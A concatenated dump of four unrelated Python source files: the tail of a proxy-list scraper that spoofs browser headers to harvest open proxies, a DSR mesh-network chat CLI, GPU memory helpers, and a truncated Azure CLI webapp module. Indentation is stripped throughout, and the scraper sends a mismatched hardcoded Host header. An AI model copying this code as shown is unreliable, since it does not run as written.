opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'str_rot13(.*?)</script>', html)
templs2 = re.findall(r'<td>[1-99999].*?</td>', html)
for i in range(len(templs)):
temp = templs[i].replace('("', '')#remove front of string
temp = temp.replace('")))', '')#remove back of string
temp = temp.decode('rot13').decode('base64')#decode from rot13 then from base64
workerQueue.put(temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
bug("coolproxy() " + temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def samair():
print "Grabbing: http://www.samair.ru/"
primary_url = "http://www.samair.ru/proxy/proxy-00.htm"
urls = []
for i in range(1, 31):
if i < 10:
urls.append(primary_url.replace("00", "0" + str(i)))
else:
urls.append(primary_url.replace("00", str(i)))
for url in urls:
try:
bug("grabbing " + "'" + url + "'")
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
links = re.findall(r'<tr><td>(.*?):(.*?)</td><td>', html)
for link in links:
workerQueue.put(link[0] + ":" + link[1])
bug("samair() " + link[0] + ":" + link[1])
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def proxylisty():
print "Grabbing: http://www.proxylisty.com/"
primary_url = "http://www.proxylisty.com/ip-proxylist-"
urls = []
for i in range(1, 68):
urls.append(primary_url + str(i))
for url in urls:
try:
bug("grabbing " + "'" + url + "'")
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'<tr>\n<td>(.*?)</td>', html)
templs2 = re.findall(r'com/port/(.*?)-ip-list', html)
for i in range(len(templs)):
workerQueue.put(templs[i] + ":" + templs2[i])
bug("proxylisty() " + templs[i] + ":" + templs2[i])
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def nntime():
print "Grabbing: http://nntime.com/"
primary_url = "http://nntime.com/proxy-list-00.htm"
urls = []
for i in range(1, 31):
if i < 10:
urls.append(primary_url.replace("00", "0" + str(i)))
else:
urls.append(primary_url.replace("00", str(i)))
for url in urls:
try:
response = urllib.urlopen(url)
html = response.read()
decoder_string = re.findall(r'<script type="text/javascript">\n(.*?)</script>', html)
decoderls = decoder_string[0].split(";")
temp_tuple = []
for itm in decoderls:
if itm:
temp_tuple.append((itm.split("=")))
decoder_dict = dict(temp_tuple)
ips = re.findall(r'></td><td>(.*?)<script type="text/javascript">document', html)
ports = []
templs = re.findall(r'<script type="text/javascript">.*?</script>', html)
for line in templs:
temp = line.replace('<script type="text/javascript">document.write(":"+', '')
temp = temp.replace(')</script>', '')
codes = temp.split("+")
temp_port = ""
for code in codes:
temp_port += decoder_dict[code]
ports.append(temp_port)
for i in range(len(ips)):
#print ips[i] + ":" + ports[i]
workerQueue.put(ips[i] + ":" + ports[i])
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def aliveproxy():
print "Grabbing: http://www.aliveproxy.com/"
urls = []
url = "http://www.aliveproxy.com/"
response = urllib.urlopen(url)
html = response.read()
pos = html.find("Socks 5")
html = html[:pos]
temp_urls = re.findall(r'href=[\'"]?([^\'" >]+)', html)
for itm in temp_urls:
if "http://www.aliveproxy.com/proxy-list/proxies.aspx/" in itm:
urls.append(itm)
for url in urls:
response = urllib.urlopen(url)
html = response.read()
templs = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):(\d{1,5})', html)
for itm in templs:
workerQueue.put(itm[0] + ":" + itm[1])
if __name__ == "__main__":
print "#######################################"
print "#######################################"
print "###### Proxy Scraper Script V1.2 ######"
print "## http://scrapeomatic.blogspot.com/ ##"
print "#######################################"
print "#######################################\n"
print "Starting Proxy Scraper...\n"
proxyCount = 0
workerQueue = Queue.Queue()
tQueueThread = threading.Thread(target=queueThread)
tQueueThread.setDaemon(True)
tProxylist = threading.Thread(target=proxylist)
tProxylist.setDaemon(True)
tUsproxy = threading.Thread(target=usproxy)
tUsproxy.setDaemon(True)
tFreeproxylist = threading.Thread(target=freeproxylist)
tFreeproxylist.setDaemon(True)
tCoolproxy = threading.Thread(target=coolproxy)
tCoolproxy.setDaemon(True)
tSamair = threading.Thread(target=samair)
tSamair.setDaemon(True)
tProxylisty = threading.Thread(target=proxylisty)
tProxylisty.setDaemon(True)
tNntime = threading.Thread(target=nntime)
tNntime.setDaemon(True)
tAliveproxy = threading.Thread(target=aliveproxy)
tAliveproxy.setDaemon(True)
tProxylist.start()
time.sleep(.500)
tUsproxy.start()
time.sleep(.500)
tFreeproxylist.start()
time.sleep(.500)
tCoolproxy.start()
time.sleep(.500)
tSamair.start()
time.sleep(.500)
tProxylisty.start()
time.sleep(.500)
tNntime.start()
time.sleep(.500)
tAliveproxy.start()
time.sleep(2)
print "\nPlease wait..."
tProxylist.join()
tUsproxy.join()
tFreeproxylist.join()
tCoolproxy.join()
tSamair.join()
tProxylisty.join()
tNntime.join()
tAliveproxy.join()
if not workerQueue.empty():
tQueueThread.start()
tQueueThread.join()
print "Saved to file!\n"
print "Proxies found: " + str(proxyCount)
else:
print "Could not scrape any proxies!"
raw_input("\nPress any key to exit...")
sys.exit()
print "Done" |
linux_network.py | #INSTRUCTIONS
#Run using "python3 linux_network.py <your IP address>"
#The chat application we used during demonstration
#Requires that you create an ad hoc wifi network amoung the nodes using DSR to chat
#You must also know your IP in this network
#Your node ID is the last number in your IP, for example 10.1.1.12 is node ID 12
#==================================README=======================================
#
#This is a DSR protocol implementation using Python.
#
#It is the project for CITS4419 - Mobile and Wireless Computing
#at The University of Western Australia.
#
#<AUTHOR> = Ash Tyndall, Asra Alshabib, Bo Chuen Chung, Dayang Abang Mordian,
# Hui Li Leow, Max Ward, Raphael Byrne, Timothy Raphael,
# Vincent Sun, Zhiqiang (Cody) Qiu
#
#<SUPERVISOR> = Prof. Amitava Datta
#
#<ORGANIZATION> = The University of Western Australia
#
#<YEAR> = 2013
#
#<VERSION> = V1.0
#
#===============================================================================
#=================================BSD LICENSE===================================
#
#Copyright (c) <YEAR>, <AUTHOR>
#
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions
#are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# - Neither the name of the <ORGANIZATION> nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
#IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
#THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
#PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#===============================================================================
import sys
import dsr
import socket
import threading
import time
from datetime import datetime
from dsr_packet import Packet
from route_cache import RouteCache
DSR_PORT = 1069
LOG_BUFFER = []
DSR_TERMINAL_LOG_FLAG = False
TIMESTAMP_FORMAT = '%Y%m%d%H%M%S'
CURRENT_LOG_FILE = ""
RUN_TESTING = False
class Network:
def __init__(self, ip_address, dsr_port) :
self.ip_address = ip_address
self.dsr_port = dsr_port
#parse the IP address, last octet is our id, first 3 are the prefix
tokens = ip_address.split(".")
self.id = tokens[3]
self.net_prefix = tokens[0] + "." + tokens[1] + "." + tokens[2] + "."
#setup the socket, allow broadcasts and socket reuse.
self.send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.send_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.send_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#setup sending socket
self.input_buffer = []
self.run_flag = threading.Event()
self.run_flag.set()
#setup background thread for serving the socket
self.server_thread = threading.Thread(target=self.serve_socket)
self.server_thread.daemon = True
self.server_thread.start()
def receive(self) :
#method to easily clear the receive buffer
ret = self.input_buffer
#reset the buffer
self.input_buffer = []
return ret
def send(self, msg, addr) :
#dsr protocol says -1 is a broadcast
if addr == -1 :
dst_addr = "255.255.255.255"
else :
#append the prefix to create a routeable address.
dst_addr = self.net_prefix + str(addr)
#send the data on the UDP socket, force UTF-8 encoding.
self.send_socket.sendto(bytes(msg,'UTF-8'), (dst_addr, self.dsr_port))
def serve_socket(self):
self.recv_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.recv_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.recv_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.recv_socket.bind(('0.0.0.0', self.dsr_port))
while True:
message, address = self.recv_socket.recvfrom(1024)
if address[0] != self.ip_address:
self.input_buffer.append(message.decode(encoding="UTF-8"))
def run_background_updates(dsr, network):
global CURRENT_LOG_FILE
CURRENT_LOG_FILE = "dsr_log_" + str(get_timestamp()) + ".log"
while True:
#send messages on the network that are waiting in the outbox
dsrOutbox = dsr.pop_outbox()
for o in dsrOutbox:
network.send(o[0], o[1])
#run an update cycle
dsr.update()
#recieve messages from the network input buffer
networkInput = network.receive()
if networkInput != []:
#give them to dsr to process
for m in networkInput:
dsr.receive_packet(m)
#run an update cycle
dsr.update()
#see if we have any messages for the user.
inbox = dsr.pop_inbox()
#print to the console
if inbox != []:
#print("APP: Got Message: " + str(inbox))
for pkt in inbox:
app_msg = str(pkt.contents)
msg_parts = app_msg.split("#")
log_message("Msg from: " + msg_parts[0] + "> " + msg_parts[1])
dsr_debug = dsr.pop_debug_buffer()
global LOG_BUFFER
global DSR_TERMINAL_LOG_FLAG
if DSR_TERMINAL_LOG_FLAG == True:
for msg in dsr_debug:
write_message(msg)
LOG_BUFFER.extend(dsr_debug)
else:
for msg in dsr_debug:
write_message(msg)
#output to the terminal
for term_msg in LOG_BUFFER:
print(term_msg)
LOG_BUFFER = []
def run_testing(dsr, msg, destinations):
global RUN_TESTING
while RUN_TESTING == True:
for dst in destinations:
dsr.send_message(hostname + "#Test Message to " + dst + " from " + str(node_id), dst)
time.sleep(1)
def print_help():
print("Available Commands: ")
print("-------------------")
print("show route <id> # Prints the current best route in the cache")
print("show route-cache # Prints the entire route cache to terminal")
print("show route-cache <id> # Prints the route cache to terminal for a given destination")
print("show id # Prints the current node's ID")
print("run test <id> <id> <id> # sends test message to the following node IDs")
print("run send '<msg>' <id> # sends a message to a specific ID")
print("set debug <on/off> # Enable / Disable DSR terminal debugging")
print("set testing <on/of> # Enabled / Disable continuous testing with 'run' command")
print("help # Prints this help message")
print("exit # Exit the program")
def log_message(msg):
global LOG_BUFFER
LOG_BUFFER.append(msg)
write_message(msg)
def write_message(msg):
log_file = open(CURRENT_LOG_FILE, 'a')
log_file.write(msg)
log_file.close()
def get_timestamp():
return datetime.now().strftime(TIMESTAMP_FORMAT)
#main loop
arg_address = sys.argv[1]
#get the last octet of the IP address supplied
tokens = arg_address.split(".")
#node id as a string
node_id = tokens[3]
dsr = dsr.DSR(int(node_id))
network = Network(arg_address, DSR_PORT)
hostname = socket.gethostname()
background_thread = threading.Thread(target=run_background_updates, args=(dsr, network))
background_thread.daemon = True
background_thread.start()
while True:
user_input = input("dsr-cli@" + hostname + "> ")
user_input = user_input.strip()
write_message("dsr-cli@" + hostname + "> " + user_input)
input_tokens = user_input.split(" ")
try:
if input_tokens[0] == "show":
if input_tokens[1] == "route":
route_cache = dsr.get_route_cache()
shortest_path = route_cache.get_shortest_path(int(input_tokens[2]))
if shortest_path == None:
log_message("Path doesn't exist in cache")
else:
log_message("Shortest Path to node: " + str(input_tokens[2]) + " is " + str(shortest_path))
if input_tokens[1] == "route-cache":
route_cache = dsr.get_route_cache()
if len(input_tokens) == 2:
log_message("Current Route Cache: " + str(route_cache.get_edge_list()))
if len(input_tokens) > 2:
try:
val = int(input_tokens[2])
log_message("Current Route Cache for ID " + str(input_tokens[2]) + ": " + str(route_cache.get_edge_list()[input_tokens[2]]))
except ValueError:
log_message("Input not a valid node ID")
if input_tokens[1] == "id":
log_message("Node ID: " + str(node_id))
except IndexError:
print_help()
try:
if input_tokens[0] == "run":
if input_tokens[1] == "test":
length = len(input_tokens)
ids_to_send_to = []
#ensure our input is good.
try:
#not the best, but allows me to check input before processing.
for i in range (2, length):
val = int(input_tokens[i])
for k in range (2, length):
dsr.send_message(hostname + "#Test Message to " + input_tokens[k], input_tokens[k])
log_message("Send Test message to " + str(input_tokens[k]))
ids_to_send_to.append(input_tokens[k])
if RUN_TESTING == True:
msg = hostname + "#Test Message to " + str(input_tokens[k])
testing_thread = threading.Thread(target=run_testing, args=(dsr, msg, ids_to_send_to))
testing_thread.daemon = True
testing_thread.start()
except ValueError:
log_message("Input not a valid node ID")
if input_tokens[1] == "send":
quote_tokens = user_input.split('"')
if len(quote_tokens) != 3:
raise IndexError('')
message = quote_tokens[1]
dst = quote_tokens[2].strip()
message = hostname + "#" + message
try:
val = int(dst)
dsr.send_message(message, dst)
except ValueError:
log_message("Input not a valid node ID")
except IndexError:
print_help()
try:
if input_tokens[0] == "set":
if input_tokens[1] == "debug":
if input_tokens[2] == "on":
DSR_TERMINAL_LOG_FLAG = True
log_message("DSR Debugging enabled")
elif input_tokens[2] == "off":
DSR_TERMINAL_LOG_FLAG = False
log_message("DSR Debugging disabled")
else:
log_message("Unsupported input " + str(input_tokens[2]))
if input_tokens[1] == "testing":
if input_tokens[2] == "on":
RUN_TESTING = True
if input_tokens[2] == "off":
RUN_TESTING = False
if input_tokens[0] == "help":
print_help()
if input_tokens[0] == "exit":
exit(0)
except IndexError:
print_help()
if input_tokens[0] != "show" and input_tokens[0] != "run" and input_tokens[0] != "set" and input_tokens[0] != "help" and input_tokens[0] != "":
log_message("Unsupported input '" + str(input_tokens[0]) + "'")
|
mem.py | "Utility functions for memory management"
from ..imports.torch import *
from ..core import *
from ..script import *
from ..utils.env import *
import pynvml, functools, traceback, threading, time
from collections import namedtuple
IS_IN_IPYTHON = is_in_ipython()
GPUMemory = namedtuple('GPUMemory', ['total', 'used', 'free'])
have_cuda = 0
if torch.cuda.is_available():
pynvml.nvmlInit()
have_cuda = 1
def preload_pytorch():
torch.ones((1, 1)).cuda()
def b2mb(num):
""" convert Bs to MBs and round down """
return int(num/2**20)
def gpu_mem_get(id=None):
"get total, used and free memory (in MBs) for gpu `id`. if `id` is not passed, currently selected torch device is used"
if not have_cuda: return GPUMemory(0, 0, 0)
if id is None: id = torch.cuda.current_device()
try:
handle = pynvml.nvmlDeviceGetHandleByIndex(id)
info = pynvml.nvmlDeviceGetMemoryInfo(handle)
return GPUMemory(*(map(b2mb, [info.total, info.used, info.free])))
except:
return GPUMemory(0, 0, 0)
def gpu_mem_get_all():
"get total, used and free memory (in MBs) for each available gpu"
if not have_cuda: return []
return list(map(gpu_mem_get, range(pynvml.nvmlDeviceGetCount())))
def gpu_mem_get_free_no_cache():
"get free memory (in MBs) for the currently selected gpu id, after emptying the cache"
torch.cuda.empty_cache()
return gpu_mem_get().free
def gpu_mem_get_used_no_cache():
"get used memory (in MBs) for the currently selected gpu id, after emptying the cache"
torch.cuda.empty_cache()
return gpu_mem_get().used
def gpu_mem_get_used_fast(gpu_handle):
"get used memory (in MBs) for the currently selected gpu id, w/o emptying the cache, and needing the `gpu_handle` arg"
info = pynvml.nvmlDeviceGetMemoryInfo(gpu_handle)
return b2mb(info.used)
def gpu_with_max_free_mem():
"get [gpu_id, its_free_ram] for the first gpu with highest available RAM"
mem_all = gpu_mem_get_all()
if not len(mem_all): return None, 0
free_all = np.array([x.free for x in mem_all])
id = np.argmax(free_all)
return id, free_all[id]
def get_ref_free_exc_info():
"Free traceback from references to locals() in each frame to avoid circular reference leading to gc.collect() unable to reclaim memory"
type, val, tb = sys.exc_info()
traceback.clear_frames(tb)
return (type, val, tb)
def gpu_mem_restore(func):
"Reclaim GPU RAM if CUDA out of memory happened, or execution was interrupted"
@functools.wraps(func)
def wrapper(*args, **kwargs):
tb_clear_frames = os.environ.get('FASTAI_TB_CLEAR_FRAMES', None)
if not IS_IN_IPYTHON or tb_clear_frames=="0":
return func(*args, **kwargs)
try:
return func(*args, **kwargs)
except Exception as e:
if ("CUDA out of memory" in str(e) or
"device-side assert triggered" in str(e) or
tb_clear_frames == "1"):
type, val, tb = get_ref_free_exc_info() # must!
gc.collect()
raise type(val).with_traceback(tb) from None
else: raise # re-raises the exact last exception
return wrapper
class gpu_mem_restore_ctx():
"context manager to reclaim RAM if an exception happened under ipython"
def __enter__(self): return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not exc_val: return True
traceback.clear_frames(exc_tb)
gc.collect()
raise exc_type(exc_val).with_traceback(exc_tb) from None
class GPUMemTrace():
"Trace GPU allocated and peak memory usage"
def __init__(self, silent=False):
assert torch.cuda.is_available(), "pytorch CUDA is required"
self.silent = silent # quickly turn off printouts from the constructor
def silent(self, silent=False):
self.silent = silent
def reset(self):
self.used_start = gpu_mem_get_used_no_cache()
self.used_peak = self.used_start
def start(self):
self.reset()
self.peak_monitor_start()
def stop(self):
self.peak_monitor_stop()
def __del__(self):
self.stop()
def data(self):
self.delta_used = gpu_mem_get_used_no_cache() - self.used_start
self.delta_peak = self.used_peak - self.used_start
return (self.delta_used, self.delta_peak)
def report_n_reset(self, note=''):
self.report(note)
self.reset()
def report(self, note=''):
"printout used+delta peak, and an optional context note"
if self.silent: return
delta_used, delta_peak = self.data()
if note: note = f": {note}"
print(f"△used {delta_used}, △peak {delta_peak}{note}")
def peak_monitor_start(self):
self.peak_monitoring = True
# continually sample RAM usage
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def peak_monitor_stop(self):
self.peak_monitoring = False
def peak_monitor_func(self):
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(torch.cuda.current_device())
while True:
self.used_peak = max(gpu_mem_get_used_fast(gpu_handle), self.used_peak)
if not self.peak_monitoring: break
time.sleep(0.001) # 1msec
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
from binascii import hexlify
from os import urandom
import json
import ssl
import sys
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction, ManagedServiceIdentity,
DeletedAppRestoreRequest, DefaultErrorResponseException,
SnapshotRestoreRequest, SnapshotRecoverySource)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
should_create_new_rg, set_location, should_create_new_asp, should_create_new_app,
get_lang_from_content)
from ._constants import (NODE_RUNTIME_NAME, OS_DEFAULT, STATIC_RUNTIME_NAME, PYTHON_RUNTIME_NAME)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, multicontainer_config_type=None, multicontainer_config_file=None,
tags=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = '8.11.1'
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
